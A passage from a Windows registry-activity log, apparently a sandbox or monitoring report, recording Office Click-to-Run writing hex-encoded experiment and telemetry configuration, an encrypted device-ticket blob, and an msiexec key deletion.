31303022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e46696c65494f2e5265667265736855706f6e526573746f726174696f6e222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e46696c65494f2e536572766572496e666f4d736f446176436865636b456e61626c6564222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e46696c65494f2e536861726555726c456e64706f696e744361636865456e61626c6564222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e46696c65494f2e53686f756c645265717565737451756572794578706563746564416363657373222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e46696c65494f2e536b6970556e636f6d70617261626c65446f776e6c6f61645265766973696f6e222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e46696c65494f2e536b6970576563496e6974447572696e674f70656e222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e46696c65494f2e53747269637453746f726167654c6966656379636c65222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e46696c65494f2e537472697056657273696f6e494446726f6d55726c4265666f726553656e64696e67546f437369222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e46696c65494f2e5472696767657253796e63496e7369646548616e646c6542617365446f776e6c6f61644572726f72222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e46696c65494f2e556e7365745265736f757263654964496646696c655761734e6f745361766564546f536572766572222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e46696c65494f2e5573654361636865644e6574776f726b436f6e6e656374696f6e222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e46696c65494f2e5573655265666163746f72656453796e634368616e6e656c496e486f73745265766973696f6e7355706461746572222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e46696c65494f2e557365586d6c48747470436f6d706f6e656e74222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e46696c65494f2e56616c69646174654d617050617468734c697465222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e466c6f6f64676174652e44656661756c744368616e6e656c436f6f6c646f776e2e42616e6e6572222c20225622203a2022696e7433325f747c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e466c6f6f64676174652e456e61626c6543616d706169676e436c69656e74222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e466c6f6f64676174652e456e61626c654d6f6465726e466c6f7757697468546965726564476f7665726e616e6365222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e466c6f6f64676174652e456e61626c654d756c74694c61756e636853757276657943616d706169676e73222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e466c6f6f64676174652e456e61626c6554656c656d657472794576656e745472616e736475636572222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e466c6f6f64676174652e456e61626c6564222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e466c6f6f64676174652e496e7369646572546f6173744c61756e63686572456e61626c6564222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e466c6f6f64676174652e4d617843616d706169676e73506572417070222c20225622203a2022696e7433325f747c323522207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e466c6f6f64676174652e4d6178446961676e6f73746963436f6c6c656374696f6e73506572417070222c20225622203a2022696e7433325f747c323022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e466c6f6f64676174652e4e6f746669636174696f6e4c61756e63686572456e61626c6564222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e466c6f6f64676174652e50726976616379436865636b466f724e6f6e436f6e74726f6c6c657253657276696365466f72537572766579222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e466c6f6f64676174652e526f616d696e67426173656443616d706169676e537461746573222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e466c6f6f64676174652e526f616d696e674261736564476f7665726e65644368616e6e656c537461746573222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e466c6f6f64676174652e526f616d696e67426173656453757276657941637469766174696f6e5374617473222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e466c6f6f64676174652e53757276657973456e61626c6564222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e47726170686963732e4368616e6765476174652e41766f6964556e6e656365737361727944657669636552656372656174654f6e446973706c61794368616e6765222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e47726170686963732e4368616e6765476174652e436865636b507265666572436d644c697374466f7243616c6c436d64546f7373556e646f222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e47726170686963732e4368616e6765476174652e456e73757265496e6b5374796c65496e69745769746853757266616365222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e47726170686963732e4368616e6765476174652e4669784465766963655265456e756d65726174696f6e222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e47726170686963732e4368616e6765476174652e52756e4d6f646966794465736372697074696f6e436f6d6d616e6441734d6f6465726e496e457863656c222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e47726170686963732e4368616e6765476174652e5365745465787446696c6c546f426c61636b466f7253656c6563746564486967686c69676874222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e47726170686963732e4368616e6765476174652e5365745465787446696c6c546f426c61636b466f7253656c6563746564486967686c6967687432222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e47726170686963732e4368616e6765476174652e5573655368617265644458474941646170746572456e756d65726174696f6e4c6f676963466f7253746172747570222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e47726170686963732e436f6d6d616e64732e456e61626c6553657450696374757265417370656374526174696f436d64222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e47726170686963732e436f6d6d616e64732e456e61626c655365745461626c655374796c65436d64222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e47726170686963732e456e61626c654368616e676550696374757265436f6d6d616e64466f72426c697046696c6c73222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e47726170686963732e456e61626c655356474c696e65416e6446696c6c436f6d6d616e6473466f72536861706573222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e47726170686963732e47657443616c6c537461636b466f7246576964656e222c20225622203a2022696e7433325f747c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e47726170686963732e49636f46696c746572456e61626c6564222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e47726170686963732e496e6b2e44656c657465416c6c496e6b222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e47726170686963732e4d617833444d6174657269616c5465787475726553697a65222c20225622203a2022696e7433325f747c3430393622207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e47726170686963732e4d6f64656c33444f6e6c696e652e426c6f636b6564436f756e7472696573222c20225622203a20227374643a3a77737472696e677c61663b647a3b62683b636e3b63753b65673b69643b69723b69713b6a6f3b6b773b6c623b6c793b6d723b6d613b6b703b6f6d3b71613b73613b73643b73793b746e3b74723b61653b796522207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e47726170686963732e4d6f64656c33444f6e6c696e652e426c6f636b65644c616e677561676573222c20225622203a20227374643a3a77737472696e677c74722d74723b7a682d636e3b61722d73613b69642d696422207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e47726170686963732e4d756c74695363656e654465707265636174696f6e732e476574554957696e646f7746726f6d55736572496e74657266616365222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e47726170686963732e526574727943726561746544324431466163746f72794f6e44656c61794c6f61644661696c7572654d617852657472696573222c20225622203a2022696e7433325f747c323022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e47726170686963732e536e61704c696e655769647468496e50656e222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e47726170686963732e53746172744174506172656e7454696d65222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e47726170686963732e537570706f727454657874496e535647546f5368617065436f6e76657273696f6e222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e47726170686963732e557365417263546578747572654265666f7265443244222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e47726170686963732e5573654c6973744e6f6465222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e47726170686963732e5573654c6f676963616c445049466f72566563746f72496d6167655265736f75726365222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e47726170686963732e557365536d617274496e6b416e616c797a6572466f72496e6b456469746f72222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e47726f7774682e41697254726166666963436f6e74726f6c2e466f726365456e67696e6553657475704f6e4247546872656164222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e47726f7774682e41697254726166666963436f6e74726f6c2e4f7074696d697a65526f616d696e6753657474696e67222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e47726f7774682e41697254726166666963436f6e74726f6c2e547275737442617244656c6179466f726d6174222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e47726f7774682e41697254726166666963436f6e74726f6c2e556e666f726d6174746564427573426172222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e48656c702e496e636c756465436f6d6d616e6454797065222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4964656e746974792e4144414c5468726f74746c696e67456e61626c6564222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4964656e746974792e41766f696453656e64696e675368617265506f696e7448656164657273546f5075626c6963456e64706f696e7473222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4964656e746974792e4368616e6765476174652e4f6e6c7950657273697374536368656d65466f7253657276657255726c73222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4964656e746974792e456e61626c6557616d54656c656d65747279426c6f62222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4964656e746974792e456e7375726550726f66696c65466f725072696d6172794964656e746974696573222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4964656e746974792e49676e6f726544697361626c654144414c61746f7057414d4f76657272696465466f725075726557414d222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4964656e746974792e53706f41757468436f6e74657874456e61626c6564222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4964656e746974792e5573654964656e7469747943726564656e7469616c734661696c757265496e666f222c20225622203a2022626f6f6c7c3122207d2c207b202246 C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\0.5 = 44796e616d6963436f6e6669672e446961676e6f7374696373222c20225622203a20227374643a3a77737472696e677c7b205c225375624e616d657370616365735c22203a207b205c22436f6c6c6563746f725c22203a207b205c224576656e74735c22203a207b205c2253746172745472616365436f6c6c6563746f725c22203a207b205c224576656e74466c61675c22203a20323536207d207d207d207d207d22207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54656c656d6574727944796e616d6963436f6e6669672e446f6373222c20225622203a20227374643a3a77737472696e677c7b205c224576656e74735c22203a207b205c22536861726564436f6d6d656e74735f447261667443617264556e6d6f756e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224544502a5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22456e74657270726973654461746150726f74656374696f6e2a5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224d736f456e74657270726973654461746150726f74656374696f6e2a5c22203a207b205c224576656e74466c61675c22203a2032207d207d2c205c225375624e616d657370616365735c22203a207b205c22536861726564436f6d6d656e74735c22203a207b205c224576656e74735c22203a207b205c22436f6d6d6974436f6d6d656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224469736361726444726166744173796e635c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224469736361726444726166744e61746976655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22447261667453746174654d616e61676572456e644472616674696e675c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22456e644472616674696e675c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22506f737444726166745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2244656c657465506f7374416374696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2244656c657465546872656164416374696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2245324550657266547261636b65725c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224472616674436172644d6f756e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2244726166744361726452656e64657265645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224d61726b436f6d6d656e744372656174696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2252656f70656e546872656164416374696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225265736f6c7665546872656164416374696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22536d6172745265706c79506f737465645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224162616e646f6e44726166745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224469736361726444726166745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22436f6d6d656e74436f6e746578744368616e676564416374696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224c6f6164436f6d6d656e74416374696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224469737061746368436c6f7365566965774576656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224469737061746368436f6e74657874437265617465644576656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2244697370617463684f70656e566965774576656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224469737061746368566965774368616e6765644576656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224469737061746368426567696e44726166744576656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2244697370617463684361706162696c69746965734368616e6765645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224469737061746368436f6d6d656e74734368616e6765644576656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224469737061746368436f6d6d656e7453656c65637465644576656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224469737061746368437265617465436f6d6d656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224469737061746368446f634368616e6765644576656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224469737061746368456e64436f6d6d656e7453657373696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224469737061746368456e6444726166744576656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2244697370617463684576656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224469737061746368466f63757350616e655472696767657265644576656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224469737061746368496e6974436f6d6d656e7453657373696f6e4173796e635c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224469737061746368496e697469616c52656e646572436f6d706c657465644576656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224469737061746368496e76616c69644576656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2244697370617463684c6f6164546872656164735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446973706174636850616e654368616e6765644576656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446973706174636850616e65466f63757353746174654368616e6765644576656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446973706174636850616e65546f52656e6465724576656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446973706174636853656c656374436f6d6d656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446973706174636853657448616c6650616e65446973706c61794d6f64655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2244697370617463685468656d654368616e6765645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446973706174636844656c657465436f6d6d656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22436c656172436f6d6d656e7453656c656374696f6e416374696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c22446f63756d656e74416374697669746965735c22203a207b205c224576656e74735c22203a207b205c2241637469766974794c6f6744697363617264466f72446f63756d656e744368616e67655c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c2241637469766974794c6f67547269676765724173796e635461736b576f726b65725c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c225472616e736d697451756575654c6f61644173796e635c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c225472616e736d69745175657565496e697446696c65506174685c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c225472616e736d69745175657565437265617465496e73616e63655c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c225472616e736d69745175657565417070656e644173796e6342617463685c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c225472616e736d69745175657565577269746541637469766974795c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c225472616e736d6974517565756552656d6f76654173796e6342617463685c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c225472616e736d697451756575655772697465446f63756d656e74496e666f4865616465725c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c225472616e736d6974517565756554727944656c657465456d70747946696c654173796e635c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c225472616e736d69745175657565496e7365727441637469766974794e6f6e437269746963616c5c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c2241637469766974794c6f67456e717565756541637469766974794e6f6e437269746963616c5c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c2241637469766974794c6f6741646441637469766974794e6f6e437269746963616c5c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c2241637469766974794c6f674372656174654c6f675c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c2241637469766974794c6f67536176654e657746696c655c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c2241637469766974794c6f674469736361726441637469766974794e6f6e437269746963616c5c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c2241637469766974794c6f67456e71756575654c6f63616c4e6f6e437269746963616c5c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c2241637469766974794c6f67456e71756575654f7574676f696e674e6f6e437269746963616c5c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c225472616e736d697451756575654469736361726441637469766974794e6f6e437269746963616c5c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c224170694f70656e41637469766974794c6f675769746853747265616d5c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c2241637469766974794c6f6741646441637469766974795c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c2241637469766974794c6f674361636865446f63756d656e74496e666f5c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c2241637469766974794c6f67456e74727946696e616c697a655c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c2241637469766974794c6f6746696c7465724f757443757272656e7455736572416374697669746965735c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c2241637469766974794c6f674c6f616446726f6d53747265616d5c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c2241637469766974794c6f6753617665546f53747265616d5c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c225472616e736d69745175657565436865636b5265766f6b65644544505c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c225472616e736d69745175657565526570616972436f7272757074656446696c654173796e635c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c2241637469766974794c6f674d6f64696679436c6f6e655c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c225472616e736d6974517565756546696c654f70656e4572726f725c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c225472616e736d6974517565756546696c65526561644572726f725c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c225472616e736d6974517565756546696c655265706c6163654572726f725c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c225472616e736d6974517565756546696c6557726974654572726f725c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c225472616e736d69745175657565536574456e74657270726973654461746150726f74656374696f6e4173796e635c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c225472616e736d697451756575655472756e6361746551756575655c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c2241637469766974794c6f67456e7472794372656174655c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c2241637469766974794c6f67456e74727953657453746174655c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c22536572766963654163746976697479526573756c745c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c2241637469766974794c6f674f6e436f6e74656e74416374696f6e5c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c2241637469766974794c6f67456e717565756541637469766974795c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c2241637469766974794c6f674469736361726441637469766974795c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c225472616e736d69745175657565496e7365727441637469766974795c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c225472616e736d697451756575654469736361726441637469766974795c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c2241637469766974794c6f67456e71756575654f7574676f696e675c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c2241637469766974794c6f67436c6f73655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225472616e736d6974517565756548656c706572456e737572654469726563746f72795c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225472616e736d697451756575654d616e61676572437265617465496e73616e63655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2241706943726561746541637469766974794c6f675c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224170694372656174654c6f675c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225472616e736d69745175657565536574456e74657270726973654461746150726f74656374696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2241637469766974794c6f674173796e635461736b5c22203a207b205c224576656e74466c61675c22203a20323536207d207d207d2c205c22436f6c6c6162436f726e65725c22203a207b205c224576656e74735c22203a207b205c22436f617574686f725570646174654c6f636174696f6e5c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c22436f617574686f72476f546f43757272656e744c6f636174696f6e5c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c22436f6175746847616c6c6572795573657252655265676973746572436f6e6e65637469766974794368616e67654e6f7469667949664e65636573736172795c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c224f666669636543686174436f6d6d616e6443686174427574746f6e497356697369626c654e6f7744617461706f696e745c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c22436f6175746847616c6c65727955736572436c6f736553696e676c65466c796f75745c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c224f666669636543686174436f6d6d616e64497343686174417661696c61626c655c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c22436f6175746847616c6c6572794f6e436f617574686f72735265747269657665644173796e63506f73745c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c22436f6175746847616c6c6572795265747269657665436f617574686f72735c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c22436f6175746847616c6c6572794f6e436f617574686f72735265747269657665645c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c22436f6175746847616c6c6572795265747269657665436f617574686f72734265666f72654173796e63506f73745c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c22436f6175746847616c6c657279496e6974464d5c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c22436f6175746847616c6c657279436f617574686f72577261707065725c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c224f666669636543686174436f6d6d616e64436f61757468696e6757697468416c6c4775657374734f724d697373696e67456d61696c456469746f72735c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c22476f546f4c6f636174696f6e416374696f6e487562416374696f6e4a756d70546f417574686f725c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c22436f6175746847616c6c65727955736572557064617465417574686f724c6f636174696f6e5c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c22436f6175746847616c6c65727955736572557064617465456d61696c416e64436861745c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c22436f6e7461637443617264416374696f6e487562416374696f6e53686f77436f6e74616374436172645c22203a207b205c C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\VersionId = "uint16_t|0" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\Expires = "int64_t|1719363189" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{2B379600-B42B-4FE9-A59C-A312FB934935}\DeviceTicket = 0100000001000000d08c9ddf0115d1118c7a00c04fc297eb0100000006c260b99474614fad9fe56f63a9fd8900000000020000000000106600000001000020000000744e586f769b7bc0a949a033cb8de499b58fbe1c9c8b338a15399fb8340c60a3000000000e80000000020000200000000bfd90e36f54cda67ee904dfe6abc155bcf753aace260f5e7fd9f84486075b6cf00300001845300b1fcb0034f1e547f8a5debdf8ade7c4056584410bb4d2fd4e4a21c6f90a55ffcb4644f2e8cb320c3a5d4d62029233909b13a863ecc632b1f5d66cc9bb92d44be9f01bb1f027f9cdf638ee0fe73333eb287a8cb795e5b1805fde7889f3cd88ff5fb9a4a6cddba59e19f75e267091d2de1d23b7c6cef063664e3160a2d28e1e8c18dc23274e9a6486af0cba690c813e1d206f7e528a553b6e9e427aef72c6da4e3823edbe519cd6e49e989c95db99aba43347f70e6d69ade526a372fa6f1efe3d4016122236cc7d746ae6a37b67e3a8b497c62a5a4b952978707bbddb9050c35ecf6f2f11fbe48d17b648075b755821fc2c09a2f80b6497a35e467b7407cc295f3bb353ad381e95753a0c528c1821d1add862d5aadd48d3fbfba0f07d37c82367aeef385be3ded4ba3d6bad2f45736e26e8aa41ceddde048bd8fc2e4b0c8d0f6f7d36d9bb943012f09553af7394cc14a90c81a5711c9338e43c85fb450054b8f87504585c6fe9fdba0a222e72c1c9d2ea48b816fd82000c115dd63e86696b14682f0951b34870a42678dcb430c6de342a13022a9c62c1b43b0399c30db17059992b0e544ed80ed2608f959e37f81f78402fde48f5b88367556d0739d605b0fede2421b0338ef1ec5b94f138b7215a2fa113038a08714332a1de41d4706ca2c560c21355fe5e0b91ddbdaf421a0ed3b0304aa488736a30e6b64e40183d6087a8d9c22e3bba9c64fb7ee53332b4045dc9915d88f11974814151a41d578df90f473cc803b806118039ffb0e24151e03110f42c524427e1086ff309fc80fcc48ef2a712dc204ba72601e51736fe5c2bee8530d00d26b2a2cd491c8e7c8d5f1d65566d363f916ffbf275f25c5ccd9ad02db9bb769e2caefba046c93495c17c986c99304217cff163720322a69021fecc9e8c61ec8278815cd8ad6636930d7912956c78d31fb3dcd7e3b1be0ad04733647f2d2a7f55eba3560fcd496c8b07b02517c244f764eb7ccf596b16ca4556bfbc09d4b941874b6bec7f2360a0df21fe9e73d20ed515e19796c08c46388b6b1c40568d4bf0f42aaefa58d25dc0213770bcb1870a337698ba51d68000b4204231d4e7e56eeb3baa953e0bc68f318d8a630f3ce8c3cca6f3a364e5fa5c11f7a5fabe2dbffc96070add304baa117ee38cc3b835db282303b5f0a61c895c41165b71b3ca64e2461da696119d877c1a7ab305718e8b7b067227fa8549165ab85d42e849c92a38a2e9408927a0f7a7610f0b01c1e278391935d9296347199d3f56bc044983ac3ddf6536445ecd229951943bd504d12a342ded774b39e55f245d9d616e92089767c8245aea4430aae3e6382ed5e257691c51b5e2ab5421fd0766ad23cf21219c2bfe735e27f56a7d25ac3fd1356c78dc753bdc2734f054e16c745600dce74000000072d6af7b120e93e0383412258ad99ed5fe1cfd08858e79b302f43c3c1547a7bd809dd33ed166cfc5d9dea9e04426006a7dbf782d592b3c9c79ea189e0e03ee67 C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\2A\52C64B7E C:\Windows\system32\msiexec.exe N/A
